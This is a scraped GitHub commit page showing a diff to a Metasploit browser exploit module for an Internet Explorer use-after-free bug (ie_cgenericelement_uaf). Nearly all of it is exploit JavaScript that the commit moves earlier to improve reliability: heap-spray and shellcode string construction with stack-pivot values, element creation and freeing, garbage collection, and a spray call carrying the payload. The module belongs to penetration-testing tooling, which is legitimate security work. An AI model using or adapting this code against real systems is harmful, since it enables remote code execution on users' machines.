Skip to content

Commit 94f841d

Browse files
author
jvazquez-r7
committed
Land rapid7#1810, @wchen-r7's modification to make ie_cgenericelement_uaf more stable
2 parents f9f769c + 9043eed commit 94f841d

File tree

1 file changed

+16
-16
lines changed

1 file changed

+16
-16
lines changed

modules/exploits/windows/browser/ie_cgenericelement_uaf.rb

Lines changed: 16 additions & 16 deletions
Original file line numberDiff line numberDiff line change
@@ -227,6 +227,22 @@ def load_exploit_html(my_target, cli)
227227
228228
function helloWorld()
229229
{
230+
sparkle = unescape("ABCD");
231+
for (i=0; i < 2; i++) {
232+
sparkle += unescape("ABCD");
233+
}
234+
sparkle += unescape("AB");
235+
sparkle += unescape("#{js_payload}");
236+
237+
magenta = unescape("#{align_esp}");
238+
239+
for (i=0; i < 0x70/4; i++) {
240+
if (i == 0x70/4-1) { magenta += unescape("#{xchg_esp}"); }
241+
else { magenta += unescape("#{align_esp}"); }
242+
}
243+
244+
magenta += sparkle;
245+
230246
f0 = document.createElement('span');
231247
document.body.appendChild(f0);
232248
f1 = document.createElement('span');
@@ -246,22 +262,6 @@ def load_exploit_html(my_target, cli)
246262
f1.innerHTML = "";
247263
248264
CollectGarbage();
249-
250-
sparkle = unescape("ABCD");
251-
for (i=0; i < 2; i++) {
252-
sparkle += unescape("ABCD");
253-
}
254-
sparkle += unescape("AB");
255-
sparkle += unescape("#{js_payload}");
256-
257-
magenta = unescape("#{align_esp}");
258-
259-
for (i=0; i < 0x70/4; i++) {
260-
if (i == 0x70/4-1) { magenta += unescape("#{xchg_esp}"); }
261-
else { magenta += unescape("#{align_esp}"); }
262-
}
263-
264-
magenta += sparkle;
265265
mstime_malloc({shellcode:magenta, heapBlockSize:0x38, objId:"myanim"});
266266
}
267267

0 commit comments

Comments
 (0)